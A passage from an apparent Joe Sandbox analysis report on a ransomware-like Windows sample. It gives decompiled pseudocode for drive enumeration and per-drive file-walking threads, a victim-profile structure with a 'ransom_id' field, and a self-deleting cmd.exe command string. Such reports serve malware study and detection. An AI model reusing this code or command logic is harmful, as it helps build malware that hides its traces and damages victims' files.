                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                      • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                      • API String ID: 4033023619-516011104
                                      • Opcode ID: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
                                      • Instruction ID: 72ce1eeed403cc9d60347bc981b2010fd1fdc34af71b64a0c2a2ed5fbb2db01d
                                      • Opcode Fuzzy Hash: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
                                      • Instruction Fuzzy Hash: E2F0C971BC572277F2351B655D0FF4B2D689B85F56F250036BB087E2D28AF468008AED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403200(void* __ecx, char _a4, intOrPtr _a8) {
                                      				char _t5;
                                      				char _t6;
                                      				intOrPtr _t8;
                                      				int _t10;
                                      				CHAR* _t13;
                                      				int _t15;
                                      				void* _t18;
                                      				CHAR* _t21;
                                      				CHAR* _t23;
                                      
                                      				_t1 =  &_a4; // 0x405135
                                      				_t23 =  *_t1;
                                      				_t18 = __ecx;
                                      				_t5 =  *_t23;
                                      				if(_t5 == 0) {
                                      					L4:
                                      					_t6 =  *_t23;
                                      					if(_t6 == 0x7d) {
                                      						goto L10;
                                      					} else {
                                      						_t21 = _t23;
                                      						if(_t6 != 0) {
                                      							while( *_t21 != 0x7d) {
                                      								_t21 =  &(_t21[1]);
                                      								if( *_t21 != 0) {
                                      									continue;
                                      								} else {
                                      								}
                                      								goto L12;
                                      							}
                                      							 *_t21 = 0;
                                      						}
                                      						L12:
                                      						_t8 = _a8;
                                      						if(_t8 != 1) {
                                      							if(_t8 == 2) {
                                      								_t10 = lstrlenA(_t23);
                                      								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
                                      								 *(_t18 + 8) = _t13;
                                      								goto L16;
                                      							}
                                      						} else {
                                      							_t15 = lstrlenA(_t23);
                                      							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
                                      							 *(_t18 + 4) = _t13;
                                      							L16:
                                      							if(_t13 != 0) {
                                      								lstrcpyA(_t13, _t23);
                                      							}
                                      						}
                                      						 *_t21 = 0x7d;
                                      						return 1;
                                      					}
                                      				} else {
                                      					while(_t5 != 0x7d) {
                                      						_t23 =  &(_t23[1]);
                                      						if(_t5 == 0x3d) {
                                      							goto L4;
                                      						} else {
                                      							_t5 =  *_t23;
                                      							if(_t5 != 0) {
                                      								continue;
                                      							} else {
                                      								goto L4;
                                      							}
                                      						}
                                      						goto L19;
                                      					}
                                      					L10:
                                      					return 0;
                                      				}
                                      				L19:
                                      			}












                                      0x00403205
                                      0x00403205
                                      0x00403208
                                      0x0040320a
                                      0x0040320e
                                      0x0040321f
                                      0x0040321f
                                      0x00403223
                                      0x00000000
                                      0x00403225
                                      0x00403226
                                      0x0040322a
                                      0x00403230
                                      0x00403235
                                      0x00403239
                                      0x00000000
                                      0x00000000
                                      0x0040323b
                                      0x00000000
                                      0x00403239
                                      0x00403245
                                      0x00403245
                                      0x00403248
                                      0x00403248
                                      0x0040324e
                                      0x00403270
                                      0x00403273
                                      0x00403284
                                      0x0040328a
                                      0x00000000
                                      0x0040328a
                                      0x00403250
                                      0x00403251
                                      0x00403262
                                      0x00403268
                                      0x0040328d
                                      0x0040328f
                                      0x00403293
                                      0x00403293
                                      0x0040328f
                                      0x00403299
                                      0x004032a5
                                      0x004032a5
                                      0x00403210
                                      0x00403210
                                      0x00403214
                                      0x00403217
                                      0x00000000
                                      0x00403219
                                      0x00403219
                                      0x0040321d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040321d
                                      0x00000000
                                      0x00403217
                                      0x0040323e
                                      0x00403242
                                      0x00403242
                                      0x00000000

                                      APIs
                                      • lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403251
                                      • GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040325B
                                      • HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403262
                                      • lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403273
                                      • GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040327D
                                      • HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403284
                                      • lstrcpyA.KERNEL32(00000000,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403293
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                      • String ID: 5Q@$5Q@
                                      • API String ID: 511007297-547021831
                                      • Opcode ID: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
                                      • Instruction ID: bda05b356578e7771a31f68481e16acc2b94da25dd7eb2ac23c0ab8e8a28fe1a
                                      • Opcode Fuzzy Hash: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
                                      • Instruction Fuzzy Hash: 9A119330504295AAEB211F68990C767BF5CAF12352F2440BFE8C5FB391C7398D4687A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00403DE0(struct _SECURITY_ATTRIBUTES* __ecx) {
                                      				char _v612;
                                      				char _v644;
                                      				void* _v908;
                                      				void* _v912;
                                      				intOrPtr _v916;
                                      				intOrPtr _v920;
                                      				short _v924;
                                      				signed int _v928;
                                      				intOrPtr _v932;
                                      				void* _v936;
                                      				intOrPtr _v940;
                                      				intOrPtr _v944;
                                      				intOrPtr _v948;
                                      				long _v952;
                                      				struct _SECURITY_ATTRIBUTES* _v956;
                                      				struct _SECURITY_ATTRIBUTES* _v960;
                                      				struct _SECURITY_ATTRIBUTES* _v964;
                                      				char _v968;
                                      				void* _t67;
                                      				short _t68;
                                      				intOrPtr _t69;
                                      				int _t72;
                                      				long _t75;
                                      				signed int _t77;
                                      				signed int _t80;
                                      				intOrPtr* _t82;
                                      				void* _t84;
                                      				struct _SECURITY_ATTRIBUTES* _t87;
                                      				long _t88;
                                      				intOrPtr _t89;
                                      				intOrPtr _t92;
                                      				intOrPtr _t95;
                                      				char _t101;
                                      				intOrPtr _t106;
                                      				void _t110;
                                      				struct _SECURITY_ATTRIBUTES** _t114;
                                      				intOrPtr _t115;
                                      				signed int _t119;
                                      				void* _t121;
                                      
                                      				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
                                      				_t87 = __ecx;
                                      				_v964 = __ecx;
                                      				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
                                      				 *((intOrPtr*)(_t67 + 4)) = _t87;
                                      				_t88 = 0;
                                      				 *_t67 = 0x43;
                                      				_t68 =  *L"?:\\"; // 0x3a003f
                                      				_v924 = _t68;
                                      				_t69 =  *0x40e308; // 0x5c
                                      				_v920 = _t69;
                                      				_v968 = GetTickCount();
                                      				_t114 =  &_v644;
                                      				_t110 = 0x41;
                                      				do {
                                      					_v924 = _t110;
                                      					_t72 = GetDriveTypeW( &_v924);
                                      					if(_t72 >= 2 && _t72 != 5) {
                                      						 *((intOrPtr*)(_t114 - 4)) = _v964;
                                      						_t84 = _t114 - 8;
                                      						 *_t84 = _t110;
                                      						 *_t114 = 0;
                                      						_t114[2] = 0;
                                      						_t114[3] = 0;
                                      						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E00406840, _t84, 0, 0);
                                      						_t88 = _t88 + 1;
                                      						_t114 =  &(_t114[6]);
                                      					}
                                      					_t110 = _t110 + 1;
                                      				} while (_t110 <= 0x5a);
                                      				_v952 = _t88;
                                      				asm("xorps xmm0, xmm0");
                                      				_v956 = 0;
                                      				_v960 = 0;
                                      				asm("movlpd [esp+0x38], xmm0");
                                      				asm("movlpd [esp+0x30], xmm0");
                                      				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
                                      				_t75 = GetTickCount();
                                      				asm("xorps xmm0, xmm0");
                                      				_t115 = _v948;
                                      				_v932 = _t75 - _v968;
                                      				_t77 = 0;
                                      				_v964 = 0;
                                      				asm("movlpd [esp+0x40], xmm0");
                                      				if(_t88 < 2) {
                                      					_t95 = _v940;
                                      					_t106 = _v944;
                                      				} else {
                                      					_t26 = _t88 - 2; // -1
                                      					_t92 = _v940;
                                      					_t82 =  &_v612;
                                      					_t101 = (_t26 >> 1) + 1;
                                      					_v968 = _t101;
                                      					_v928 = _t101 + _t101;
                                      					_t106 = _v944;
                                      					do {
                                      						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
                                      						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
                                      						asm("adc edi, [eax-0x14]");
                                      						_t115 = _t115 +  *_t82;
                                      						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
                                      						asm("adc edx, [eax+0x4]");
                                      						_t82 = _t82 + 0x30;
                                      						_t41 =  &_v968;
                                      						 *_t41 = _v968 - 1;
                                      					} while ( *_t41 != 0);
                                      					_t77 = _v928;
                                      					_v968 = _t92;
                                      					_t88 = _v952;
                                      					_t95 = _v968;
                                      				}
                                      				if(_t77 >= _t88) {
                                      					_t89 = _v916;
                                      				} else {
                                      					_t80 = _t77 + _t77 * 2;
                                      					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
                                      					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
                                      				}
                                      				asm("adc edx, edi");
                                      				asm("adc edx, eax");
                                      				return E00405540(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
                                      			}










































                                      0x00403de6
                                      0x00403df8
                                      0x00403dfc
                                      0x00403e00
                                      0x00403e0b
                                      0x00403e0e
                                      0x00403e10
                                      0x00403e13
                                      0x00403e18
                                      0x00403e1c
                                      0x00403e21
                                      0x00403e2b
                                      0x00403e2f
                                      0x00403e36
                                      0x00403e40
                                      0x00403e44
                                      0x00403e4a
                                      0x00403e53
                                      0x00403e62
                                      0x00403e65
                                      0x00403e72
                                      0x00403e75
                                      0x00403e7b
                                      0x00403e82
                                      0x00403e8f
                                      0x00403e93
                                      0x00403e94
                                      0x00403e94
                                      0x00403e97
                                      0x00403e98
                                      0x00403ea6
                                      0x00403eaa
                                      0x00403ead
                                      0x00403eb7
                                      0x00403ebf
                                      0x00403ec5
                                      0x00403ecb
                                      0x00403ed1
                                      0x00403edb
                                      0x00403ee2
                                      0x00403ee6
                                      0x00403eea
                                      0x00403eec
                                      0x00403ef4
                                      0x00403efd
                                      0x00403f5c
                                      0x00403f60
                                      0x00403eff
                                      0x00403eff
                                      0x00403f02
                                      0x00403f08
                                      0x00403f0f
                                      0x00403f10
                                      0x00403f17
                                      0x00403f1b
                                      0x00403f20
                                      0x00403f27
                                      0x00403f2a
                                      0x00403f2e
                                      0x00403f38
                                      0x00403f3a
                                      0x00403f3e
                                      0x00403f41
                                      0x00403f44
                                      0x00403f44
                                      0x00403f44
                                      0x00403f4a
                                      0x00403f4e
                                      0x00403f52
                                      0x00403f56
                                      0x00403f56
                                      0x00403f66
                                      0x00403f8a
                                      0x00403f68
                                      0x00403f68
                                      0x00403f72
                                      0x00403f76
                                      0x00403f7d
                                      0x00403f94
                                      0x00403f98
                                      0x00403fb6

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 00403E00
                                      • GetTickCount.KERNEL32 ref: 00403E25
                                      • GetDriveTypeW.KERNEL32(?), ref: 00403E4A
                                      • CreateThread.KERNEL32 ref: 00403E89
                                      • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 00403ECB
                                      • GetTickCount.KERNEL32 ref: 00403ED1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                      • String ID: ?:\
                                      • API String ID: 458387131-2533537817
                                      • Opcode ID: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
                                      • Instruction ID: a427c5faede150c50d802e976730206525a879d89cb9664245e235534ffcdea3
                                      • Opcode Fuzzy Hash: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
                                      • Instruction Fuzzy Hash: FF5136719083019FC310CF14C988B5BBBE5FF88315F504A2EFA89A73A1D375A944CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406840(void* _a4) {
                                      				intOrPtr _v0;
                                      				intOrPtr _v4;
                                      				long _v8;
                                      				intOrPtr _v12;
                                      				void* _v16;
                                      				struct _CRITICAL_SECTION _v40;
                                      				WCHAR* _t12;
                                      				void* _t22;
                                      
                                      				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                      				_t22 = _a4;
                                      				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
                                      				InitializeCriticalSection( &_v40);
                                      				_v12 = 0x2710;
                                      				_v8 = 0;
                                      				_v4 = 0xffffffff;
                                      				_v0 = 0xffffffff;
                                      				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
                                      				E004066F0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
                                      				VirtualFree(_t22, 0, 0x8000);
                                      				ExitThread(0);
                                      			}











                                      0x00406859
                                      0x0040685f
                                      0x0040686e
                                      0x0040687c
                                      0x00406890
                                      0x00406898
                                      0x004068a0
                                      0x004068a8
                                      0x004068b6
                                      0x004068cb
                                      0x004068db
                                      0x004068e3

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 00406859
                                      • wsprintfW.USER32 ref: 0040686E
                                      • InitializeCriticalSection.KERNEL32(?), ref: 0040687C
                                      • VirtualAlloc.KERNEL32 ref: 004068B0
                                        • Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
                                        • Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
                                        • Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 004068DB
                                      • ExitThread.KERNEL32 ref: 004068E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                      • String ID: %c:\
                                      • API String ID: 1988002015-3142399695
                                      • Opcode ID: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
                                      • Instruction ID: d88b45d10d8f236cef520cbec221070cd426d639c7b6d1ffd4d7ad39dfd3f75c
                                      • Opcode Fuzzy Hash: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
                                      • Instruction Fuzzy Hash: 800196B5244300BFE7109F50CD8EF577BA8AB84B14F004628FB65AD1E2D7B09904CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E004033E0(int* __ecx, void* __eflags, char _a4) {
                                      				int* _v8;
                                      				void* _t8;
                                      				char _t10;
                                      				void* _t14;
                                      				void* _t15;
                                      				char _t18;
                                      				char _t19;
                                      				int _t20;
                                      				CHAR* _t23;
                                      				CHAR* _t26;
                                      				CHAR* _t35;
                                      				CHAR* _t40;
                                      
                                      				_push(__ecx);
                                      				_t1 =  &_a4; // 0x405135
                                      				_t26 =  *_t1;
                                      				_t37 = __ecx;
                                      				_v8 = __ecx;
                                      				__ecx[3] = _t26;
                                      				_t8 = E004032B0(__ecx);
                                      				if(_t8 == 0 || _t8 == 0xffffffff) {
                                      					ExitProcess(0);
                                      				}
                                      				if(E00403320(__ecx) == 0) {
                                      					 *__ecx = 0;
                                      					_t10 =  *_t26;
                                      					if(_t10 == 0) {
                                      						goto L4;
                                      					} else {
                                      						do {
                                      							if(_t10 == 0x7b) {
                                      								_t26 =  &(_t26[1]);
                                      								_t14 = E00403190(_t26);
                                      								if(_t14 != 0) {
                                      									_t15 = _t14 - 1;
                                      									if(_t15 == 0) {
                                      										E00403200(_t37, _t26, 1);
                                      									} else {
                                      										if(_t15 == 1) {
                                      											_t18 =  *_t26;
                                      											_t35 = _t26;
                                      											if(_t18 == 0) {
                                      												L15:
                                      												_t19 =  *_t35;
                                      												if(_t19 != 0x7d) {
                                      													_t40 = _t35;
                                      													if(_t19 != 0) {
                                      														while( *_t40 != 0x7d) {
                                      															_t40 =  &(_t40[1]);
                                      															if( *_t40 != 0) {
                                      																continue;
                                      															} else {
                                      															}
                                      															goto L21;
                                      														}
                                      														 *_t40 = 0;
                                      													}
                                      													L21:
                                      													_t20 = lstrlenA(_t35);
                                      													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
                                      													 *(_v8 + 8) = _t23;
                                      													if(_t23 != 0) {
                                      														lstrcpyA(_t23, _t35);
                                      													}
                                      													 *_t40 = 0x7d;
                                      													_t37 = _v8;
                                      												}
                                      											} else {
                                      												while(_t18 != 0x7d) {
                                      													_t35 =  &(_t35[1]);
                                      													if(_t18 == 0x3d) {
                                      														goto L15;
                                      													} else {
                                      														_t18 =  *_t35;
                                      														if(_t18 != 0) {
                                      															continue;
                                      														} else {
                                      															goto L15;
                                      														}
                                      													}
                                      													goto L25;
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      							L25:
                                      							_t10 = _t26[1];
                                      							_t26 =  &(_t26[1]);
                                      						} while (_t10 != 0);
                                      						return 1;
                                      					}
                                      				} else {
                                      					 *__ecx = 1;
                                      					L4:
                                      					return 1;
                                      				}
                                      			}















                                      0x004033e3
                                      0x004033e5
                                      0x004033e5
                                      0x004033e9
                                      0x004033eb
                                      0x004033ee
                                      0x004033f1
                                      0x004033f8
                                      0x004034db
                                      0x004034db
                                      0x00403410
                                      0x00403425
                                      0x0040342b
                                      0x0040342f
                                      0x00000000
                                      0x00403431
                                      0x00403432
                                      0x00403434
                                      0x0040343a
                                      0x00403441
                                      0x00403444
                                      0x0040344a
                                      0x0040344b
                                      0x004034ba
                                      0x0040344d
                                      0x0040344e
                                      0x00403450
                                      0x00403452
                                      0x00403456
                                      0x00403467
                                      0x00403467
                                      0x0040346b
                                      0x0040346d
                                      0x00403471
                                      0x00403473
                                      0x00403478
                                      0x0040347c
                                      0x00000000
                                      0x00000000
                                      0x0040347e
                                      0x00000000
                                      0x0040347c
                                      0x00403480
                                      0x00403480
                                      0x00403483
                                      0x00403484
                                      0x00403495
                                      0x0040349e
                                      0x004034a3
                                      0x004034a7
                                      0x004034a7
                                      0x004034ad
                                      0x004034b0
                                      0x004034b0
                                      0x00000000
                                      0x00403458
                                      0x0040345c
                                      0x0040345f
                                      0x00000000
                                      0x00403461
                                      0x00403461
                                      0x00403465
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403465
                                      0x00000000
                                      0x0040345f
                                      0x00403458
                                      0x00403456
                                      0x0040344e
                                      0x0040344b
                                      0x00403444
                                      0x004034bf
                                      0x004034bf
                                      0x004034c2
                                      0x004034c3
                                      0x004034d6
                                      0x004034d6
                                      0x00403412
                                      0x00403412
                                      0x00403418
                                      0x00403422
                                      0x00403422

                                      APIs
                                        • Part of subcall function 004032B0: lstrlenA.KERNEL32(?,00000000,?,5Q@,?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032C5
                                        • Part of subcall function 004032B0: lstrlenA.KERNEL32(?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032EE
                                      • lstrlenA.KERNEL32(5Q@,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403484
                                      • GetProcessHeap.KERNEL32(00000008,00000001,?,00405135,00000000), ref: 0040348E
                                      • HeapAlloc.KERNEL32(00000000,?,00405135,00000000), ref: 00403495
                                      • lstrcpyA.KERNEL32(00000000,5Q@,?,00405135,00000000), ref: 004034A7
                                      • ExitProcess.KERNEL32 ref: 004034DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                      • String ID: 5Q@
                                      • API String ID: 1867342102-144561132
                                      • Opcode ID: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
                                      • Instruction ID: a602f992c252cea2a24e073b1cce2c09e2fd92cb4485f691b182cac4319fe13f
                                      • Opcode Fuzzy Hash: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
                                      • Instruction Fuzzy Hash: BA31E3305042455AEB265F289C447B77FAC9B06312F1841BBE8C5BF3C2D67D4E4787A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00402C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                      				struct tagPAINTSTRUCT _v68;
                                      				struct tagPAINTSTRUCT _v88;
                                      				short _v100;
                                      				intOrPtr _t13;
                                      				void* _t15;
                                      				struct HDC__* _t21;
                                      				int _t30;
                                      
                                      				_t13 =  *0x40e290; // 0x21
                                      				asm("movdqu xmm0, [0x40e280]");
                                      				_t30 = _a8;
                                      				_v88.fErase = _t13;
                                      				asm("movdqu [esp+0x10], xmm0");
                                      				_t15 = _t30 - 2;
                                      				if(_t15 == 0) {
                                      					CreateThread(0, 0, E00402AD0, 0, 0, 0);
                                      					DestroyWindow(_a4);
                                      					return 0xdeadbeef;
                                      				} else {
                                      					if(_t15 == 0xd) {
                                      						_t21 = BeginPaint(_a4,  &_v68);
                                      						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
                                      						EndPaint(_a4,  &_v88);
                                      						return 0;
                                      					} else {
                                      						return DefWindowProcW(_a4, _t30, _a12, _a16);
                                      					}
                                      				}
                                      			}










                                      0x00402c59
                                      0x00402c5e
                                      0x00402c66
                                      0x00402c69
                                      0x00402c70
                                      0x00402c76
                                      0x00402c79
                                      0x00402ce9
                                      0x00402cf2
                                      0x00402d01
                                      0x00402c7b
                                      0x00402c7e
                                      0x00402c9f
                                      0x00402cbd
                                      0x00402ccb
                                      0x00402cd7
                                      0x00402c80
                                      0x00402c94
                                      0x00402c94
                                      0x00402c7e

                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00402C8A
                                      • BeginPaint.USER32(?,?), ref: 00402C9F
                                      • lstrlenW.KERNEL32(?), ref: 00402CAC
                                      • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 00402CBD
                                      • EndPaint.USER32(?,?), ref: 00402CCB
                                      • CreateThread.KERNEL32 ref: 00402CE9
                                      • DestroyWindow.USER32(?), ref: 00402CF2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                      • String ID:
                                      • API String ID: 572880375-0
                                      • Opcode ID: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
                                      • Instruction ID: 316be470bdb16b495eaa6a8a4de42634492684a59cc3721c0e018fd81b09cf01
                                      • Opcode Fuzzy Hash: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
                                      • Instruction Fuzzy Hash: D5116332604209ABE711DF54EE0DFAA7B6CFB48311F000626FD45E91E1E7B19D24DB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004039B0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a28, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52, intOrPtr _a60, intOrPtr _a76, intOrPtr _a84) {
                                      				intOrPtr* _t44;
                                      
                                      				_t44 = __ecx;
                                      				 *__ecx = _a4;
                                      				 *((intOrPtr*)(__ecx + 0xc)) = _a12;
                                      				 *((intOrPtr*)(__ecx + 0x24)) = _a28;
                                      				 *((intOrPtr*)(__ecx + 0x30)) = _a36;
                                      				 *((intOrPtr*)(__ecx + 0x3c)) = _a44;
                                      				 *((intOrPtr*)(__ecx + 0x48)) = _a52;
                                      				 *((intOrPtr*)(__ecx + 0x54)) = _a60;
                                      				 *((intOrPtr*)(__ecx + 0x74)) = _a76;
                                      				 *(__ecx + 4) = L"pc_user";
                                      				 *(__ecx + 0x10) = L"pc_name";
                                      				 *((intOrPtr*)(__ecx + 0x18)) = 1;
                                      				 *(__ecx + 0x1c) = L"pc_group";
                                      				 *(__ecx + 0x28) = L"av";
                                      				 *(__ecx + 0x34) = L"pc_lang";
                                      				 *(__ecx + 0x40) = L"pc_keyb";
                                      				 *(__ecx + 0x4c) = L"os_major";
                                      				 *(__ecx + 0x58) = L"os_bit";
                                      				 *((intOrPtr*)(__ecx + 0x60)) = 1;
                                      				 *(__ecx + 0x64) = L"ransom_id";
                                      				 *((intOrPtr*)(__ecx + 0x78)) = L"hdd";
                                      				 *((intOrPtr*)(__ecx + 0x80)) = _a84;
                                      				 *(__ecx + 0x88) = L"ip";
                                      				 *((intOrPtr*)(_t44 + 0x8c)) = GetProcessHeap();
                                      				return _t44;
                                      			}




                                      0x004039b7
                                      0x004039b9
                                      0x004039be
                                      0x004039c4
                                      0x004039ca
                                      0x004039d0
                                      0x004039d6
                                      0x004039dc
                                      0x004039e2
                                      0x004039e8
                                      0x004039ef
                                      0x004039f6
                                      0x004039fd
                                      0x00403a04
                                      0x00403a0b
                                      0x00403a12
                                      0x00403a19
                                      0x00403a20
                                      0x00403a27
                                      0x00403a2e
                                      0x00403a35
                                      0x00403a3c
                                      0x00403a42
                                      0x00403a52
